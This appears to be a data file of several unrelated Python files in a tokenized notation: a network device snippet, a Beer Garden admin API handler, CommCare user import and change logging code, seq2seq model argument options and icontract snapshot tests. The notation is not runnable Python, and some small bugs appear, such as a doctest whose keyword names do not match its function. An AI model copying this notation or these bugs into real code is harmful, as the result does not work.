<if_stmt>self.connection<and>self.connection.setting_object<ne>DBUS_OBJECT_BASE<block_start>self._settings=NetworkSetting(self.connection.setting_object)<line_sep><await>self._settings.connect()<block_end># Wireless <if_stmt>self.type<eq>DeviceType.WIRELESS<block_start>self._wireless=NetworkWireless(self.object_path)<line_sep><await>self._wireless.connect()<block_end><block_end><block_end>
# -*- coding: utf-8 -*- <import_from_stmt>brewtils.errors ModelValidationError<import_from_stmt>brewtils.models Operation<import_from_stmt>brewtils.schema_parser SchemaParser<import_from_stmt>beer_garden.api.http.base_handler BaseHandler<class_stmt>AdminAPI(BaseHandler)<block_start><async_keyword><def_stmt>patch self<block_start>""" --- summary: Initiate administrative actions description: | The body of the request needs to contain a set of instructions detailing the operations to perform. Currently the supported operations are `rescan`: ```JSON [ { "operation": "rescan" } ] ``` * Will remove from the registry and database any currently stopped plugins who's directory has been removed. * Will add and start any new plugin directories. And reloading the plugin logging configuration: ```JSON [ { "operation": "reload", "path": "/config/logging/plugin" } ] ``` parameters: - name: patch in: body required: true description: Instructions for operations schema: $ref: '#/definitions/Patch' responses: 204: description: Operation successfully initiated 50x: $ref: '#/definitions/50xError' tags: - Admin """<line_sep>operations=SchemaParser.parse_patch(self.request.decoded_body many=<true> from_string=<true>)<for_stmt>op operations<block_start><if_stmt>op.operation<eq>"rescan"<block_start><await>self.client(Operation(operation_type="RUNNER_RESCAN"))<block_end><elif_stmt>op.operation<eq>"reload"<block_start><if_stmt>op.path<eq>"/config/logging/plugin"<block_start><await>self.client(Operation(operation_type="PLUGIN_LOG_RELOAD"))<block_end><else_stmt><block_start><raise>ModelValidationError(f"Unsupported path '{op.path}'")<block_end><block_end><else_stmt><block_start><raise>ModelValidationError(f"Unsupported operation '{op.operation}'")<block_end><block_end>self.set_status(204)<block_end><block_end>
<import_from_stmt>dimagi.utils.parsing string_to_boolean<import_from_stmt>corehq.apps.custom_data_fields.models PROFILE_SLUG<import_from_stmt>corehq.apps.user_importer.exceptions UserUploadError<import_from_stmt>corehq.apps.users.audit.change_messages UserChangeMessage<import_from_stmt>corehq.apps.users.model_log UserModelAction<import_from_stmt>corehq.apps.users.util log_user_change<def_stmt>spec_value_to_boolean_or_none user_spec_dict key<block_start>value=user_spec_dict.get(key <none>)<if_stmt>value<and>isinstance(value str)<block_start><return>string_to_boolean(value)<block_end><elif_stmt>isinstance(value bool)<block_start><return>value<block_end><else_stmt><block_start><return><none><block_end><block_end><class_stmt>UserChangeLogger(object)<block_start>""" User change logger to record - changes to user properties - text messages for changes - useful info for changes to associated data models like role/locations """<def_stmt>__init__ self upload_domain user_domain user is_new_user changed_by_user changed_via upload_record_id user_domain_required_for_log=<true><block_start>self.upload_domain=upload_domain<line_sep>self.user_domain=user_domain<line_sep>self.user=user<line_sep>self.is_new_user=is_new_user<line_sep>self.changed_by_user=changed_by_user<line_sep>self.changed_via=changed_via<line_sep>self.upload_record_id=upload_record_id<line_sep>self.user_domain_required_for_log=user_domain_required_for_log<if_stmt><not>is_new_user<block_start>self.original_user_doc=self.user.to_json()<block_end><else_stmt><block_start>self.original_user_doc=<none><block_end>self.fields_changed={}<line_sep>self.change_messages={}<line_sep>self._save=<false><block_end># flag to check if log needs to be saved for updates <def_stmt>add_changes self changes<block_start>""" Add changes to user properties. Ignored for new user since the whole user doc is logged for a new user :param changes: dict of property mapped to it's new value """<if_stmt>self.is_new_user<block_start><return><block_end><for_stmt>name,new_value changes.items()<block_start><if_stmt>self.original_user_doc[name]<ne>new_value<block_start>self.fields_changed[name]=new_value<line_sep>self._save=<true><block_end><block_end><block_end><def_stmt>add_change_message self message<block_start>""" Add change message for a change in user property that is in form of a UserChangeMessage Ignored for new user since the whole user doc is logged for a new user :param message: text message for the change like 'Password reset' / 'Added as web user to domain foo' """<if_stmt>self.is_new_user<block_start><return><block_end>self._update_change_messages(message)<line_sep>self._save=<true><block_end><def_stmt>_update_change_messages self change_messages<block_start><for_stmt>slug change_messages<block_start><if_stmt>slug<in>self.change_messages<block_start><raise>UserUploadError(f"Double Entry for {slug}")<block_end><block_end>self.change_messages.update(change_messages)<block_end><def_stmt>add_info self change_message<block_start>""" Add change message for a change to the user that is in form of a UserChangeMessage """<line_sep>self._update_change_messages(change_message)<line_sep>self._save=<true><block_end><def_stmt>save self<block_start><if_stmt>self.is_new_user<or>self._save<block_start>action=UserModelAction.CREATE<if>self.is_new_user<else>UserModelAction.UPDATE<line_sep>fields_changed=<none><if>self.is_new_user<else>self.fields_changed<line_sep>log_user_change(by_domain=self.upload_domain for_domain=self.user_domain couch_user=self.user changed_by_user=self.changed_by_user changed_via=self.changed_via change_messages=self.change_messages action=action fields_changed=fields_changed bulk_upload_record_id=self.upload_record_id for_domain_required_for_log=self.user_domain_required_for_log )<block_end><block_end><block_end><class_stmt>BaseUserImporter(object)<block_start>""" Imports a Web/CommCareUser via bulk importer and also handles the logging save_log should be called explicitly to save logs, after user is saved """<def_stmt>__init__ self upload_domain user_domain user upload_user is_new_user via upload_record_id<block_start>""" :param upload_domain: domain on which the bulk upload is being done :param user_domain: domain user is being updated for :param user: user to update :param upload_user: user doing the upload :param is_new_user: if user is a new user :param via: USER_CHANGE_VIA_BULK_IMPORTER :param upload_record_id: ID of the bulk upload record """<line_sep>self.user_domain=user_domain<line_sep>self.user=user<line_sep>self.upload_user=upload_user<line_sep>self.logger=UserChangeLogger(upload_domain=upload_domain user_domain=user_domain user=user is_new_user=is_new_user changed_by_user=upload_user changed_via=via upload_record_id=upload_record_id)<line_sep>self.role_updated=<false><block_end><def_stmt>update_role self role_qualified_id<block_start>user_current_role=self.user.get_role(domain=self.user_domain)<line_sep>self.role_updated=<not>(user_current_role<and>user_current_role.get_qualified_id()<eq>role_qualified_id)<if_stmt>self.role_updated<block_start>self.user.set_role(self.user_domain role_qualified_id)<block_end><block_end><def_stmt>save_log self# Tracking for role is done post save to have role setup correctly on save <block_start><if_stmt>self.role_updated<block_start>new_role=self.user.get_role(domain=self.user_domain)<line_sep>self.logger.add_info(UserChangeMessage.role_change(new_role))<block_end>self._include_user_data_changes()<line_sep>self.logger.save()<block_end><def_stmt>_include_user_data_changes self# ToDo: consider putting just the diff <block_start><if_stmt>self.logger.original_user_doc<and>self.logger.original_user_doc['user_data']<ne>self.user.user_data<block_start>self.logger.add_changes({'user_data':self.user.user_data})<block_end><block_end><block_end><class_stmt>CommCareUserImporter(BaseUserImporter)<block_start><def_stmt>update_password self password<block_start>self.user.set_password(password)<line_sep>self.logger.add_change_message(UserChangeMessage.password_reset())<block_end><def_stmt>update_phone_numbers self phone_numbers<block_start>""" The first item in 'phone_numbers' will be the default """<line_sep>old_user_phone_numbers=self.user.phone_numbers<line_sep>fmt_phone_numbers=[_fmt_phone(n)<for>n phone_numbers]<if_stmt>any(fmt_phone_numbers)<block_start>self.user.set_phone_numbers(fmt_phone_numbers default_number=fmt_phone_numbers[0])<block_end><else_stmt><block_start>self.user.set_phone_numbers([])<block_end>self._log_phone_number_changes(old_user_phone_numbers fmt_phone_numbers)<block_end><def_stmt>update_name self name<block_start>self.user.set_full_name(str(name))<line_sep>self.logger.add_changes({'first_name':self.user.first_name 'last_name':self.user.last_name})<block_end><def_stmt>update_user_data self data uncategorized_data profile domain_info# Add in existing data. Don't use metadata - we don't want to add profile-controlled fields. <block_start>current_profile_id=self.user.user_data.get(PROFILE_SLUG)<for_stmt>key,value self.user.user_data.items()<block_start><if_stmt>key<not><in>data<block_start>data[key]=value<block_end><block_end><if_stmt>profile<block_start>profile_obj=domain_info.profiles_by_name[profile]<line_sep>data[PROFILE_SLUG]=profile_obj.id<for_stmt>key profile_obj.fields.keys()<block_start>self.user.pop_metadata(key)<block_end><block_end><try_stmt><block_start>self.user.update_metadata(data)<block_end><except_stmt>ValueError<as>e<block_start><raise>UserUploadError(str(e))<block_end><if_stmt>uncategorized_data<block_start>self.user.update_metadata(uncategorized_data)<block_end># Clear blank user data so that it can be purged by remove_unused_custom_fields_from_users_task <for_stmt>key dict(data **uncategorized_data)<block_start>value=self.user.metadata[key]<if_stmt>value<is><none><or>value<eq>''<block_start>self.user.pop_metadata(key)<block_end><block_end>new_profile_id=self.user.user_data.get(PROFILE_SLUG)<if_stmt>new_profile_id<and>new_profile_id<ne>current_profile_id<block_start>profile_name=domain_info.profile_name_by_id[new_profile_id]<line_sep>self.logger.add_info(UserChangeMessage.profile_info(new_profile_id profile_name))<block_end><block_end><def_stmt>update_language self language<block_start>self.user.language=language<line_sep>self.logger.add_changes({'language':language})<block_end><def_stmt>update_email self email<block_start>self.user.email=email.lower()<line_sep>self.logger.add_changes({'email':self.user.email})<block_end><def_stmt>update_status self is_active<block_start>self.user.is_active=is_active<line_sep>self.logger.add_changes({'is_active':is_active})<block_end><def_stmt>update_locations self location_codes domain_info<block_start><import_from_stmt>corehq.apps.user_importer.importer check_modified_user_loc find_location_id get_location_from_site_code <line_sep>location_ids=find_location_id(location_codes domain_info.location_cache)<line_sep>user_current_primary_location_id=self.user.location_id<line_sep>locations_updated,primary_loc_removed=check_modified_user_loc(location_ids self.user.location_id self.user.assigned_location_ids)<if_stmt>primary_loc_removed<block_start>self.user.unset_location(commit=<false>)<block_end><if_stmt>locations_updated<block_start>self.user.reset_locations(location_ids commit=<false>)<line_sep>self.logger.add_changes({'assigned_location_ids':location_ids})<if_stmt>location_ids<block_start>locations=[get_location_from_site_code(code domain_info.location_cache)<for>code location_codes]<line_sep>self.logger.add_info(UserChangeMessage.assigned_locations_info(locations))<block_end><else_stmt><block_start>self.logger.add_info(UserChangeMessage.assigned_locations_info([]))<block_end><block_end># log this after assigned locations are updated, which can re-set primary location <if_stmt>self.user.location_id<ne>user_current_primary_location_id<block_start>self.logger.add_changes({'location_id':self.user.location_id})<if_stmt>self.user.location_id<block_start>self.logger.add_info(UserChangeMessage.primary_location_info(self.user.get_sql_location(self.user_domain)))<block_end><else_stmt><block_start>self.logger.add_info(UserChangeMessage.primary_location_removed())<block_end><block_end><block_end><def_stmt>_log_phone_number_changes self old_phone_numbers new_phone_numbers<block_start>(items_added items_removed)=find_differences_in_list(target=new_phone_numbers source=old_phone_numbers)<line_sep>change_messages={}<if_stmt>items_added<block_start>change_messages.update(UserChangeMessage.phone_numbers_added(list(items_added))["phone_numbers"])<block_end><if_stmt>items_removed<block_start>change_messages.update(UserChangeMessage.phone_numbers_removed(list(items_removed))["phone_numbers"])<block_end><if_stmt>change_messages<block_start>self.logger.add_change_message({'phone_numbers':change_messages})<block_end><block_end><block_end><def_stmt>_fmt_phone phone_number<block_start><if_stmt>phone_number<and><not>isinstance(phone_number str)<block_start>phone_number=str(int(phone_number))<block_end><return>phone_number.lstrip("+")<block_end><class_stmt>WebUserImporter(BaseUserImporter)<block_start><def_stmt>add_to_domain self role_qualified_id location_id<block_start>self.user.add_as_web_user(self.user_domain role=role_qualified_id location_id=location_id)<line_sep>self.role_updated=bool(role_qualified_id)<line_sep>self.logger.add_info(UserChangeMessage.added_as_web_user(self.user_domain))<if_stmt>location_id<block_start>self._log_primary_location_info()<block_end><block_end><def_stmt>_log_primary_location_info self<block_start>primary_location=self.user.get_sql_location(self.user_domain)<line_sep>self.logger.add_info(UserChangeMessage.primary_location_info(primary_location))<block_end><def_stmt>update_primary_location self location_id<block_start>current_primary_location_id=get_user_primary_location_id(self.user self.user_domain)<if_stmt>location_id<block_start>self.user.set_location(self.user_domain location_id)<if_stmt>current_primary_location_id<ne>location_id<block_start>self._log_primary_location_info()<block_end><block_end><else_stmt><block_start>self.user.unset_location(self.user_domain)<line_sep># if there was a location before, log that it was cleared <if_stmt>current_primary_location_id<block_start>self.logger.add_info(UserChangeMessage.primary_location_removed())<block_end><block_end><block_end><def_stmt>update_locations self location_codes membership domain_info<block_start><import_from_stmt>corehq.apps.user_importer.importer check_modified_user_loc find_location_id get_location_from_site_code <line_sep>location_ids=find_location_id(location_codes domain_info.location_cache)<line_sep>user_current_primary_location_id=membership.location_id<line_sep>locations_updated,primary_loc_removed=check_modified_user_loc(location_ids membership.location_id membership.assigned_location_ids)<if_stmt>primary_loc_removed<block_start>self.user.unset_location(self.user_domain commit=<false>)<block_end><if_stmt>locations_updated<block_start>self.user.reset_locations(self.user_domain location_ids commit=<false>)<if_stmt>location_ids<block_start>locations=[get_location_from_site_code(code domain_info.location_cache)<for>code location_codes]<block_end><else_stmt><block_start>locations=[]<block_end>self.logger.add_info(UserChangeMessage.assigned_locations_info(locations))<block_end># log this after assigned locations are updated, which can re-set primary location user_updated_primary_location_id=get_user_primary_location_id(self.user self.user_domain)<if_stmt>user_updated_primary_location_id<ne>user_current_primary_location_id<block_start><if_stmt>user_updated_primary_location_id<block_start>self._log_primary_location_info()<block_end><else_stmt><block_start>self.logger.add_info(UserChangeMessage.primary_location_removed())<block_end><block_end><block_end><block_end><def_stmt>get_user_primary_location_id user domain<block_start>primary_location=user.get_sql_location(domain)<if_stmt>primary_location<block_start><return>primary_location.location_id<block_end><block_end><def_stmt>get_user_primary_location_name user domain<block_start>primary_location=user.get_sql_location(domain)<if_stmt>primary_location<block_start><return>primary_location.name<block_end><block_end><def_stmt>find_differences_in_list target:list source:list<block_start>""" Find the differences between 'source' and 'target' and return (added_items, removed_items) 'added_items': items that are in 'target' but not in 'source' 'removed_items': items that are in 'source' but not 'target' >>> find_differences_in_list(list_to_compare=[3,4,5,6], reference_list=[1,2,3,5]) ({4, 6}, {1, 2}) """<line_sep>shared_items=set(target).intersection(source)<line_sep>added_items=set(target).difference(shared_items)<line_sep>removed_items=set(source).difference(shared_items)<line_sep><return>added_items removed_items<block_end>
""" Implementation of all available options """<import_from_future_stmt> print_function<line_sep>"""Model architecture/optimization options for Seq2seq architecture."""<import_stmt>argparse<import_stmt>logging<line_sep>logger=logging.getLogger(__name__)<line_sep># Index of arguments concerning the core model architecture MODEL_ARCHITECTURE={'model_type' 'emsize' 'rnn_type' 'nhid' 'nlayers' 'use_all_enc_layers' 'bidirection' 'src_pos_emb' 'tgt_pos_emb' 'max_relative_pos' 'use_neg_dist' 'd_ff' 'd_k' 'd_v' 'num_head' 'trans_drop' 'n_characters' 'char_emsize' 'filter_size' 'nfilters'}<line_sep>SEQ2SEQ_ARCHITECTURE={'attn_type' 'coverage_attn' 'copy_attn' 'review_attn' 'force_copy' 'layer_wise_attn' 'split_decoder' 'reuse_copy_attn' 'reload_decoder_state' 'share_decoder_embeddings' 'conditional_decoding'}<line_sep>DATA_OPTIONS={'use_src_char' 'use_tgt_char' 'use_src_word' 'use_tgt_word' 'max_src_len' 'max_tgt_len' 'src_vocab_size' 'tgt_vocab_size' 'num_train_examples' 'batch_size' 'use_code_type' 'code_tag_type' 'uncase' 'max_characters_per_token' 'dataset_weights'}<line_sep># Index of arguments concerning the model optimizer/training MODEL_OPTIMIZER={'optimizer' 'fix_embeddings' 'learning_rate' 'momentum' 'weight_decay' 'rnn_padding' 'dropout_rnn' 'dropout' 'dropout_emb' 'cuda' 'grad_clipping' 'lr_decay' 'warmup_steps' 'num_epochs' 'parallel'}<def_stmt>str2bool v<block_start><return>v.lower()<in>('yes' 'true' 't' '1' 'y')<block_end><def_stmt>add_model_args parser<block_start>parser.register('type' 'bool' str2bool)<line_sep># Data options data=parser.add_argument_group('Data parameters')<line_sep>data.add_argument('--max_src_len' type=int default=100 help='Maximum allowed length for the source sequence')<line_sep>data.add_argument('--max_tgt_len' type=int default=50 help='Maximum allowed length for the target sequence')<line_sep>data.add_argument('--use_code_type' type='bool' default=<false> help='Use code type as additional feature for feature representations')<line_sep>data.add_argument('--code_tag_type' type=str default='subtoken' help='Use code type as additional feature for feature representations')<line_sep># Model architecture model=parser.add_argument_group('Summary Generator')<line_sep>model.add_argument('--model_type' type=str default='rnn' choices=['rnn' 'transformer'] help='Model architecture type')<line_sep>model.add_argument('--emsize' type=int default=300 help='Embedding size if embedding_file is not given')<line_sep>model.add_argument('--rnn_type' type=str default='LSTM' help='RNN type: LSTM, GRU')<line_sep>model.add_argument('--nhid' type=int default=200 help='Hidden size of RNN units')<line_sep>model.add_argument('--bidirection' type='bool' default=<true> help='use bidirectional recurrent unit')<line_sep>model.add_argument('--nlayers' type=int default=2 help='Number of encoding layers')<line_sep>model.add_argument('--use_all_enc_layers' type='bool' default=<false> help='Use a weighted average of all encoder layers\' '<concat>'representation as the contextual representation')<line_sep># Transformer specific params model.add_argument('--src_pos_emb' type='bool' default=<true> help='Use positional embeddings in encoder')<line_sep>model.add_argument('--tgt_pos_emb' type='bool' default=<true> help='Use positional embeddings in decoder')<line_sep>model.add_argument('--max_relative_pos' nargs='+' type=int default=0 help='Max value for relative position representations')<line_sep>model.add_argument('--use_neg_dist' type='bool' default=<true> help='Use negative Max value for relative position representations')<line_sep>model.add_argument('--d_ff' type=int default=2048 help='Number of units in position-wise FFNN')<line_sep>model.add_argument('--d_k' type=int default=64 help='Hidden size of heads in multi-head attention')<line_sep>model.add_argument('--d_v' type=int default=64 help='Hidden size of heads in multi-head attention')<line_sep>model.add_argument('--num_head' type=int default=8 help='Number of heads in Multi-Head Attention')<line_sep>model.add_argument('--trans_drop' type=float default=0.2 help='Dropout for transformer')<line_sep>model.add_argument('--layer_wise_attn' type='bool' default=<false> help='Use layer-wise attention in Transformer')<line_sep># Input representation specific details model.add_argument('--use_src_char' type='bool' default=<false> help='Use character embedding in the source')<line_sep>model.add_argument('--use_tgt_char' type='bool' default=<false> help='Use character embedding in the target')<line_sep>model.add_argument('--use_src_word' type='bool' default=<true> help='Use word embedding in the input')<line_sep>model.add_argument('--use_tgt_word' type='bool' default=<true> help='Use word embedding in the input')<line_sep>model.add_argument('--n_characters' type=int default=260 help='Character vocabulary size')<line_sep>model.add_argument('--char_emsize' type=int default=16 help='Character embedding size')<line_sep>model.add_argument('--filter_size' nargs='+' type=int default=5 help='Char convolution filter sizes')<line_sep>model.add_argument('--nfilters' nargs='+' type=int default=100 help='Number of char convolution filters')<line_sep>seq2seq=parser.add_argument_group('Seq2seq Model Specific Params')<line_sep>seq2seq.add_argument('--attn_type' type=str default='general' help='Attention type for the seq2seq [dot, general, mlp]')<line_sep>seq2seq.add_argument('--coverage_attn' type='bool' default=<false> help='Use coverage attention')<line_sep>seq2seq.add_argument('--copy_attn' type='bool' default=<false> help='Use copy attention')<line_sep>seq2seq.add_argument('--review_attn' type='bool' default=<false> help='Use review attention')<line_sep>seq2seq.add_argument('--force_copy' type='bool' default=<false> help='Apply force copying')<line_sep>seq2seq.add_argument('--reuse_copy_attn' type='bool' default=<false> help='Reuse encoder attention')<line_sep>seq2seq.add_argument('--share_decoder_embeddings' type='bool' default=<false> help='Share decoder embeddings weight with softmax layer')<line_sep>seq2seq.add_argument('--split_decoder' type='bool' default=<false> help='Split the decoder into two for copying and generation')<line_sep>seq2seq.add_argument('--reload_decoder_state' type=str default=<none> help='Reload decoder states for the seq2seq')<line_sep>seq2seq.add_argument('--conditional_decoding' type='bool' default=<false> help='Conditional decoding applied to Seq2seq')<line_sep># Optimization details optim=parser.add_argument_group('Neural QA Reader Optimization')<line_sep>optim.add_argument('--optimizer' type=str default='adam' choices=['sgd' 'adam' 'adamW'] help='Name of the optimizer')<line_sep>optim.add_argument('--dropout_emb' type=float default=0.2 help='Dropout rate for word embeddings')<line_sep>optim.add_argument('--dropout_rnn' type=float default=0.2 help='Dropout rate for RNN states')<line_sep>optim.add_argument('--dropout' type=float default=0.2 help='Dropout for NN layers')<line_sep>optim.add_argument('--learning_rate' type=float default=0.001 help='Learning rate for the optimizer')<line_sep>parser.add_argument('--lr_decay' type=float default=0.99 help='Decay ratio for learning rate')<line_sep>optim.add_argument('--grad_clipping' type=float default=5.0 help='Gradient clipping')<line_sep>parser.add_argument('--early_stop' type=int default=5 help='Stop training if performance doesn\'t improve')<line_sep>optim.add_argument('--weight_decay' type=float default=0 help='Weight decay factor')<line_sep>optim.add_argument('--momentum' type=float default=0 help='Momentum factor')<line_sep>optim.add_argument('--fix_embeddings' type='bool' default=<true> help='Keep word embeddings fixed (use pretrained)')<line_sep>optim.add_argument('--warmup_steps' type=int default=10000 help='Number of of warmup steps')<line_sep>optim.add_argument('--warmup_epochs' type=int default=0 help='Number of of warmup steps')<block_end><def_stmt>get_model_args args<block_start>"""Filter args for model ones. From a args Namespace, return a new Namespace with *only* the args specific to the model architecture or optimization. (i.e. the ones defined here.) """<line_sep><global>MODEL_ARCHITECTURE MODEL_OPTIMIZER SEQ2SEQ_ARCHITECTURE DATA_OPTIONS<line_sep>required_args=MODEL_ARCHITECTURE|MODEL_OPTIMIZER|SEQ2SEQ_ARCHITECTURE|DATA_OPTIONS<line_sep>arg_values={k:v<for>k,v vars(args).items()<if>k<in>required_args}<line_sep><return>argparse.Namespace(**arg_values)<block_end><def_stmt>override_model_args old_args new_args<block_start>"""Set args to new parameters. Decide which model args to keep and which to override when resolving a set of saved args and new args. We keep the new optimization or RL setting, and leave the model architecture alone. """<line_sep><global>MODEL_OPTIMIZER<line_sep>old_args,new_args=vars(old_args) vars(new_args)<for_stmt>k old_args.keys()<block_start><if_stmt>k<in>new_args<and>old_args[k]<ne>new_args[k]<block_start><if_stmt>k<in>MODEL_OPTIMIZER<block_start>logger.info('Overriding saved %s: %s --> %s'%(k old_args[k] new_args[k]))<line_sep>old_args[k]=new_args[k]<block_end><else_stmt><block_start>logger.info('Keeping saved %s: %s'%(k old_args[k]))<block_end><block_end><block_end><return>argparse.Namespace(**old_args)<block_end><def_stmt>add_new_model_args old_args new_args<block_start>"""Set args to new parameters. Decide which model args to keep and which to override when resolving a set of saved args and new args. We keep the new optimization or RL setting, and leave the model architecture alone. """<line_sep><global>ADVANCED_OPTIONS<line_sep>old_args,new_args=vars(old_args) vars(new_args)<for_stmt>k new_args.keys()<block_start><if_stmt>k<not><in>old_args<block_start><if_stmt>k<in>ADVANCED_OPTIONS<block_start>logger.info('Adding arg %s: %s'%(k new_args[k]))<line_sep>old_args[k]=new_args[k]<block_end><block_end><block_end><return>argparse.Namespace(**old_args)<block_end>
# pylint: disable=missing-docstring # pylint: disable=invalid-name # pylint: disable=unnecessary-lambda # pylint: disable=unused-argument # pylint: disable=no-self-use <import_stmt>textwrap<import_stmt>unittest<import_from_stmt>typing List Optional# pylint: disable=unused-import <import_stmt>icontract<import_stmt>tests.error<class_stmt>TestOK(unittest.TestCase)<block_start><def_stmt>test_without_argument self<arrow><none><block_start>z=[1]<line_sep>@icontract.snapshot(<lambda>:z[:] name="z")@icontract.ensure(<lambda>OLD val:OLD.z+[val]<eq>z)<def_stmt>some_func val:int<arrow><none><block_start>z.append(val)<block_end>some_func(2)<block_end><def_stmt>test_with_name_same_for_single_argument self<arrow><none><block_start>@icontract.snapshot(<lambda>lst:lst[:])@icontract.ensure(<lambda>OLD val lst:OLD.lst+[val]<eq>lst)<def_stmt>some_func lst:List[int] val:int<arrow><none><block_start>lst.append(val)<block_end># Expected to pass some_func([1] 2)<block_end><def_stmt>test_with_custom_name_for_single_argument self<arrow><none><block_start>@icontract.snapshot(<lambda>lst:len(lst) name="len_lst")@icontract.ensure(<lambda>OLD val lst:OLD.len_lst+1<eq>len(lst))<def_stmt>some_func lst:List[int] val:int<arrow><none><block_start>lst.append(val)<block_end># Expected to pass some_func([1] 2)<block_end><def_stmt>test_with_multiple_arguments self<arrow><none><block_start>@icontract.snapshot(<lambda>lst_a lst_b:set(lst_a).union(lst_b) name="union")@icontract.ensure(<lambda>OLD lst_a lst_b:set(lst_a).union(lst_b)<eq>OLD.union)<def_stmt>some_func lst_a:List[int] lst_b:List[int]<arrow><none><block_start><pass><block_end># Expected to pass some_func(lst_a=[1 2] lst_b=[3 4])<block_end><block_end><class_stmt>TestViolation(unittest.TestCase)<block_start><def_stmt>test_with_name_same_as_argument self<arrow><none><block_start>@icontract.snapshot(<lambda>lst:lst[:])@icontract.ensure(<lambda>OLD val lst:OLD.lst+[val]<eq>lst)<def_stmt>some_func lst:List[int] val:int<arrow><none><block_start>lst.append(val)<line_sep>lst.append(1984)<block_end>violation_error=<none># type: Optional[icontract.ViolationError] <try_stmt><block_start>some_func([1] 2)<block_end><except_stmt>icontract.ViolationError<as>err<block_start>violation_error=err<block_end>self.assertIsNotNone(violation_error)<line_sep>self.assertEqual(textwrap.dedent("""\ OLD.lst + [val] == lst: OLD was a bunch of OLD values OLD.lst was [1] lst was [1, 2, 1984] result was None val was 2""") tests.error.wo_mandatory_location(str(violation_error)))<block_end><def_stmt>test_with_custom_name self<arrow><none><block_start>@icontract.snapshot(<lambda>lst:len(lst) name="len_lst")@icontract.ensure(<lambda>OLD val lst:OLD.len_lst+1<eq>len(lst))<def_stmt>some_func lst:List[int] val:int<arrow><none><block_start>lst.append(val)<line_sep>lst.append(1984)<block_end>violation_error=<none># type: Optional[icontract.ViolationError] <try_stmt><block_start>some_func([1] 2)<block_end><except_stmt>icontract.ViolationError<as>err<block_start>violation_error=err<block_end>self.assertIsNotNone(violation_error)<line_sep>self.assertEqual(textwrap.dedent("""\ OLD.len_lst + 1 == len(lst): OLD was a bunch of OLD values OLD.len_lst was 1 len(lst) was 3 lst was [1, 2, 1984] result was None val was 2""") tests.error.wo_mandatory_location(str(violation_error)))<block_end><def_stmt>test_with_multiple_arguments self<arrow><none><block_start>@icontract.snapshot(<lambda>lst_a lst_b:set(lst_a).union(lst_b) name="union")@icontract.ensure(<lambda>OLD lst_a lst_b:set(lst_a).union(lst_b)<eq>OLD.union)<def_stmt>some_func lst_a:List[int] lst_b:List[int]<arrow><none><block_start>lst_a.append(1984)<block_end># bug violation_error=<none># type: Optional[icontract.ViolationError] <try_stmt><block_start>some_func(lst_a=[1 2] lst_b=[3 4])<block_end><except_stmt>icontract.ViolationError<as>err<block_start>violation_error=err<block_end>self.assertIsNotNone(violation_error)<line_sep>self.assertEqual(textwrap.dedent('''\ set(lst_a).union(lst_b) == OLD.union: OLD was a bunch of OLD values OLD.union was {1, 2, 3, 4} lst_a was [1, 2, 1984] lst_b was [3, 4] result was None set(lst_a) was {1, 2, 1984} set(lst_a).union(lst_b) was {1, 2, 3, 4, 1984}''') tests.error.wo_mandatory_location(str(violation_error)))<block_end><block_end><class_stmt>TestInvalid(unittest.TestCase)<block_start><def_stmt>test_missing_snapshot_but_old_in_postcondition self<arrow><none><block_start>@icontract.ensure(<lambda>OLD val lst:OLD.len_lst+1<eq>len(lst))<def_stmt>some_func lst:List[int] val:int<arrow><none><block_start>lst.append(val)<block_end>type_error=<none># type: Optional[TypeError] <try_stmt><block_start>some_func([1] 2)<block_end><except_stmt>TypeError<as>err<block_start>type_error=err<block_end>self.assertIsNotNone(type_error)<line_sep>self.assertEqual("The argument(s) of the contract condition have not been set: ['OLD']. "<concat>"Does the original function define them? Did you supply them in the call? "<concat>"Did you decorate the function with a snapshot to capture OLD values?" tests.error.wo_mandatory_location(str(type_error)))<block_end><def_stmt>test_conflicting_snapshots_with_argument_name self<arrow><none><block_start>value_error=<none># type: Optional[ValueError] <try_stmt># pylint: disable=unused-variable <block_start>@icontract.snapshot(<lambda>lst:lst[:])@icontract.snapshot(<lambda>lst:lst[:])@icontract.ensure(<lambda>OLD val lst:len(OLD.lst)+1<eq>len(lst))<def_stmt>some_func lst:List[int] val:int<arrow><none><block_start>lst.append(val)<block_end><block_end><except_stmt>ValueError<as>err<block_start>value_error=err<block_end>self.assertIsNotNone(value_error)<line_sep>self.assertEqual("There are conflicting snapshots with the name: 'lst'" str(value_error))<block_end><def_stmt>test_conflicting_snapshots_with_custom_name self<arrow><none><block_start>value_error=<none># type: Optional[ValueError] <try_stmt># pylint: disable=unused-variable <block_start>@icontract.snapshot(<lambda>lst:len(lst) name='len_lst')@icontract.snapshot(<lambda>lst:len(lst) name='len_lst')@icontract.ensure(<lambda>OLD val lst:OLD.len_lst+1<eq>len(lst))<def_stmt>some_func lst:List[int] val:int<arrow><none><block_start>lst.append(val)<block_end><block_end><except_stmt>ValueError<as>err<block_start>value_error=err<block_end>self.assertIsNotNone(value_error)<line_sep>self.assertEqual("There are conflicting snapshots with the name: 'len_lst'" str(value_error))<block_end><def_stmt>test_with_invalid_argument self<arrow><none># lst versus a_list <block_start>type_error=<none># type: Optional[TypeError] <try_stmt><block_start>@icontract.snapshot(<lambda>lst:len(lst) name='len_lst')@icontract.ensure(<lambda>OLD val a_list:OLD.len_lst+1<eq>len(a_list))<def_stmt>some_func a_list:List[int] val:int<arrow><none><block_start>a_list.append(val)<block_end>some_func([1] 2)<block_end><except_stmt>TypeError<as>err<block_start>type_error=err<block_end>self.assertIsNotNone(type_error)<line_sep>self.assertEqual("The argument(s) of the snapshot have not been set: ['lst']. "<concat>"Does the original function define them? Did you supply them in the call?" tests.error.wo_mandatory_location(str(type_error)))<block_end><def_stmt>test_with_no_arguments_and_no_name self<arrow><none><block_start>z=[1]<line_sep>value_error=<none># type: Optional[ValueError] <try_stmt># pylint: disable=unused-variable <block_start>@icontract.snapshot(<lambda>:z[:])@icontract.ensure(<lambda>OLD val:OLD.z+[val]<eq>z)<def_stmt>some_func val:int<arrow><none><block_start>z.append(val)<block_end><block_end><except_stmt>ValueError<as>err<block_start>value_error=err<block_end>self.assertIsNotNone(value_error)<line_sep>self.assertEqual("You must name a snapshot if no argument was given in the capture function." str(value_error))<block_end><def_stmt>test_with_multiple_arguments_and_no_name self<arrow><none><block_start>value_error=<none># type: Optional[ValueError] <try_stmt># pylint: disable=unused-variable <block_start>@icontract.snapshot(<lambda>lst_a lst_b:set(lst_a).union(lst_b))@icontract.ensure(<lambda>OLD lst_a lst_b:set(lst_a).union(lst_b)<eq>OLD.union)<def_stmt>some_func lst_a:List[int] 